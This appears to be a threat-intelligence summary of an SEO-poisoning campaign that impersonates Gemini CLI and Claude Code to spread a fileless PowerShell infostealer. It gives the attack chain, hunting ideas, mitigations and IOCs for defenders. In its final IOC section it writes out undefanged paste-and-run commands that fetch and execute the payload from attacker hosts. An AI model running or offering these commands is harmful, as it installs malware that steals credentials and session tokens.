Skip to content
.ca
sign in
9 minhigh

SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

A financially motivated eCrime campaign is leveraging SEO poisoning to impersonate AI coding assistants like Gemini CLI and Claude Code, tricking developers into executing a fileless PowerShell infostealer. The malware executes entirely in memory, disables Windows telemetry (ETW and AMSI), and harvests sensitive enterprise credentials, session tokens, and files before exfiltrating them to attacker-controlled infrastructure.

Sens:ImmediateConf:highAnalyzed:2026-05-21Google

Authors: EclecticIQ analysts

ActorsFinancially motivated eCrime actors
Fileless MalwarePowerShellInfostealerSEO Poisoning

Source:Eclecticiq

IOCs · 60

Detection / HunterGoogle

What Happened

Cybercriminals are creating fake websites that look like official download pages for popular AI tools like Google's Gemini and Anthropic's Claude. When developers try to install these tools, they are tricked into copying and pasting a malicious command that secretly installs data-stealing software. This matters because developers often have access to sensitive company systems, and stealing their passwords or session tokens can give attackers deep access to a company's network. Organizations should train developers to verify installation sources and restrict the execution of unverified scripts on their computers.

Key Takeaways

  • Financially motivated actors are using SEO poisoning to impersonate AI tools like Gemini CLI and Claude Code.
  • The campaign targets developer workstations to steal credentials, OAuth tokens, and source code access.
  • The infection relies on victims pasting a malicious PowerShell one-liner that executes a fileless infostealer in memory.
  • The malware disables ETW and AMSI to evade detection while simultaneously installing the legitimate tool to avoid suspicion.
  • The infrastructure uses typosquatted domains and bulletproof hosting to sustain operations.

Affected Systems

  • Windows
  • Developer Workstations
  • Google Chrome
  • Microsoft Edge
  • Brave
  • Mozilla Firefox
  • Slack
  • Microsoft Teams
  • Discord
  • Mattermost
  • Zoom
  • Telegram
  • WinSCP
  • PuTTY
  • OpenVPN

Attack Chain

The attack begins with SEO poisoning that directs developers searching for AI tools to fake installation pages. These pages instruct the user to copy and paste a PowerShell command, which silently downloads and executes a fileless infostealer in memory while simultaneously installing the legitimate tool to avoid suspicion. The malware disables ETW and AMSI, then uses embedded C# types to extract credentials, session cookies, and sensitive files from browsers, collaboration apps, and remote access tools. Finally, the stolen data is exfiltrated to a C2 server, which can also issue follow-on commands for arbitrary remote code execution.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article provides behavioral detection logic and hunting hypotheses based on command-line telemetry and network patterns, but does not include ready-to-use detection rules.

Detection Engineering Assessment

EDR Visibility: Medium — The malware executes entirely in memory and disables ETW and AMSI, which may blind some EDR sensors to the post-exploitation activity. However, the initial PowerShell execution and network connections are highly visible. Network Visibility: Medium — C2 traffic uses HTTPS, encrypting the payload, but the beaconing patterns to specific URI paths (/take, /process, /validate) and connections to newly registered .co.com domains can be detected. Detection Difficulty: Moderate — While the in-memory execution and telemetry tampering increase difficulty, the initial access vector relies on a highly recognizable paste-and-execute pattern (irm | iex) that is straightforward to detect.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • PowerShell Operational Logs (Event ID 4104)
  • Network Connection Logs (Sysmon Event ID 3)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Hunt for process command lines containing 'Invoke-RestMethod', 'Invoke-Expression', or their aliases 'irm' and 'iex' chained together, indicating potential fileless execution.Process Creation LogsExecutionMedium
Look for powershell.exe spawned with '-WindowStyle Hidden' or instantiated via 'Shell.Application.ShellExecute' with window style 0.Process Creation LogsExecutionLow
Search for PowerShell sessions loading types via 'Add-Type' followed by P/Invoke calls to 'advapi32.dll!CredEnumerate'.PowerShell Operational LogsCredential AccessLow
Monitor for outbound HTTP/HTTPS connections to '.co.com' domains, especially those mimicking developer tools (e.g., *-setup.com).Network Connection LogsCommand and ControlLow
Correlate powershell.exe spawning from explorer.exe or cmd.exe with outbound network connections occurring within five seconds.Process Creation and Network LogsExecutionMedium

Control Gaps

  • Lack of PowerShell Constrained Language Mode (CLM)
  • Permissive clipboard access in browsers
  • Absence of Mark-of-the-Web (MOTW) enforcement for scripts

Key Behavioral Indicators

  • powershell.exe spawning with hidden window styles
  • irm | iex command line patterns
  • PowerShell patching PSEtwLogProvider.m_enabled
  • C2 beaconing to /take, /process, and /validate endpoints

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider blocking network traffic to the identified C2 domains and IPs.
  • Evaluate whether to reset credentials and revoke active session tokens for users who may have executed the malicious commands.

Infrastructure Hardening

  • Consider enforcing PowerShell Constrained Language Mode (CLM) on developer workstations via WDAC or AppLocker.
  • Evaluate deploying AppLocker or WDAC rules to prevent powershell.exe from executing scripts downloaded from the internet based on Mark-of-the-Web (MOTW).
  • If supported by your identity provider, enforce short-lived OAuth tokens with mandatory refresh and conditional access for developer accounts.

User Protection

  • Consider implementing FIDO2 hardware security keys to minimize the impact of stolen credentials and session tokens.
  • Evaluate configuring browser policies to disable clipboard write access for untrusted sites to mitigate paste-and-execute lures.

Security Awareness

  • Consider updating developer security training to highlight the risks of copying and pasting installation commands directly from search results.
  • Evaluate rolling out awareness communications specifically targeting the impersonation of AI coding assistants and package managers.

MITRE ATT&CK Mapping

  • T1189 - Drive-by Compromise
  • T1608.006 - Stage Capabilities: SEO Poisoning
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1204.001 - User Execution: Malicious Link
  • T1204.002 - User Execution: Malicious File
  • T1027 - Obfuscated Files or Information
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1562.006 - Impair Defenses: Indicator Blocking
  • T1497.001 - Virtualization/Sandbox Evasion: System Checks
  • T1218 - System Binary Proxy Execution
  • T1057 - Process Discovery
  • T1083 - File and Directory Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1555.004 - Credentials from Windows Credential Manager
  • T1539 - Steal Web Session Cookie
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.002 - Unsecured Credentials: Credentials in Registry
  • T1005 - Data from Local System
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1573 - Encrypted Channel
  • T1105 - Ingress Tool Transfer
  • T1041 - Exfiltration Over C2 Channel

Additional IOCs

  • Ips:
    • 188[.]114[.]97[.]3 - IP address resolving to claude-setup.com hosting install.ps1.
    • 5[.]8[.]18[.]88 - IP address resolving to gemini-setup.com hosting install.ps1.
  • Domains:
    • api[.]bio9438[.]com - Attacker-controlled domain identified via passive DNS.
    • claudecode-install[.]co[.]com - Attacker-controlled domain impersonating Claude Code.
    • openclow[.]co[.]com - Attacker-controlled domain identified via passive DNS.
    • geninicli[.]co[.]com - Attacker-controlled domain impersonating Gemini CLI.
    • keepassxc[.]us[.]org - Attacker-controlled domain impersonating KeePassXC.
    • claude-code[.]co[.]com - Attacker-controlled domain impersonating Claude Code.
    • chocolatey[.]net - Attacker-controlled domain impersonating Chocolatey.
    • chocolatey-setup[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • get-monero[.]co[.]uk - Attacker-controlled domain impersonating Monero.
    • getmonero[.]us[.]com - Attacker-controlled domain impersonating Monero.
    • metrics[.]msft17[.]com - Attacker-controlled domain identified via passive DNS.
    • keepassxc[.]us[.]com - Attacker-controlled domain impersonating KeePassXC.
    • olive3451[.]com - Attacker-controlled domain identified via passive DNS.
    • chocolatey-download[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • chocolatey[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • nodejs-setup[.]co[.]com - Attacker-controlled domain impersonating Node.js.
    • community[.]chocolatey[.]net - Spoofed domain impersonating official Chocolatey infrastructure.
  • Urls:
    • hxxps://events[.]msft23[.]com/take - C2 endpoint used to request initial configuration or staging data.
    • hxxps://events[.]msft23[.]com/process - Main C2 beacon endpoint for uploading exfiltrated data and receiving tasks.
    • hxxps://events[.]msft23[.]com/validate - C2 endpoint used to confirm task execution or report status.
    • hxxps://claude-setup[.]com/install.ps1 - URL hosting the infostealer downloader script.
    • hxxps://gemini-setup[.]com/install.ps1 - URL hosting the infostealer downloader script.
  • File Hashes:
    • 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333 (SHA256) - Infostealer payload hash.
    • 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d (SHA256) - Infostealer payload hash.
    • be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16 (SHA256) - Infostealer payload hash.
    • a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d (SHA256) - Infostealer payload hash.
    • bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f (SHA256) - Infostealer payload hash.
    • a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd (SHA256) - Infostealer payload hash.
    • b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754 (SHA256) - Infostealer payload hash.
    • aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad (SHA256) - Infostealer payload hash.
    • 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a (SHA256) - Infostealer payload hash.
    • 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262 (SHA256) - Infostealer payload hash.
    • 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116 (SHA256) - Infostealer payload hash.
    • 5c6a2c73f59fd8defbf118f87e5c88ba62e3067f8e8c0ed104f3f188fa0d959d (SHA256) - Infostealer payload hash.
    • de34f2f93b74e049a08074c779a863a87a85a403594b8e220b1fba15112e6386 (SHA256) - Infostealer payload hash.
    • 0e8c45d847f57095d9879c0da764ab02431db4d5d85f50c4fd5ba38353b79eed (SHA256) - Infostealer payload hash.
    • dfd21a363f4994794f821d76ca61c834882a51b5c6f7b95627b70789462149e3 (SHA256) - Infostealer payload hash.
    • a31ae1eef3261c36b465255e624fb7ac5899bf2a9823564ba792fac8346723aa (SHA256) - Infostealer payload hash.
    • 1439d30ebeac3a6ccb9545acaa350783a83cc08746cb575e59ddb0efc77d412a (SHA256) - Infostealer payload hash.
    • 7c2a9ad5fcf489d1844f51830242f6dd9dfc203be6de3ceb07a4f6dd21c9f1a3 (SHA256) - Infostealer payload hash.
    • 80ffc86673bd8c8bd5862bbe961323a822b23c94df48c685162c571445552faa (SHA256) - Infostealer payload hash.
    • c416052c8ac6bfb78b7f0c46c568c528ead33501149661f1d9ecb1861269f8fa (SHA256) - Infostealer payload hash.
    • efbf87447d93f4232b1169920f75c2066d19863ebc28fb2d2662353dc4ef61d8 (SHA256) - Infostealer payload hash.
    • 2d9ecc9321994558d0cc0e9d3fa9fdf600bacfe8758976d34f26f89c33bd5007 (SHA256) - Infostealer payload hash.
    • ae9bc11adb457930d402844bd3bf3af8ea7c13fdb7ea269fbe73877b18af1ca8 (SHA256) - Infostealer payload hash.
    • c213ce07b5791abd334ff749b5f05ecc6b40772d35ef4388b5f576bc3e619765 (SHA256) - Infostealer payload hash.
    • 27e17661f5573f63b65e3a5cfe5bdca75acdc1911441b032781f7ebe125d9194 (SHA256) - Infostealer payload hash.
    • ae8f70dad97fedecd707977ca22fd6f656c64c0dac96e03f0f4a6c04d0693f59 (SHA256) - Infostealer payload hash.
    • c47610c9df3fb101b0e99f2ac12589db653464edf12cebaa2c67fd33fc7715f3 (SHA256) - Infostealer payload hash.
    • 5071921cb1ca369fe8f7af522a00373c8c85e4357f7ea1879d2cb4ae791797d6 (SHA256) - Infostealer payload hash.
  • Registry Keys:
    • HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\ - Targeted by infostealer to extract stored WinSCP session passwords.
    • HKCU:\Software\SimonTatham\PuTTY\Sessions - Targeted by infostealer to extract saved PuTTY session configurations.
  • Command Lines:
    • Purpose: Downloads and executes the fileless infostealer payload in memory. | Tools: PowerShell | Stage: Execution | irm events.msft23.com | iex
    • Purpose: Fake Node.js installation command that downloads the infostealer. | Tools: PowerShell | Stage: Execution | powershell.exe -c "irm https://community.chocolatey.net/install.ps1|iex"
    • Purpose: Installs the legitimate Gemini CLI tool to mask the malicious activity. | Tools: npm | Stage: Defense Evasion | npm install -g @google/gemini-cli

Related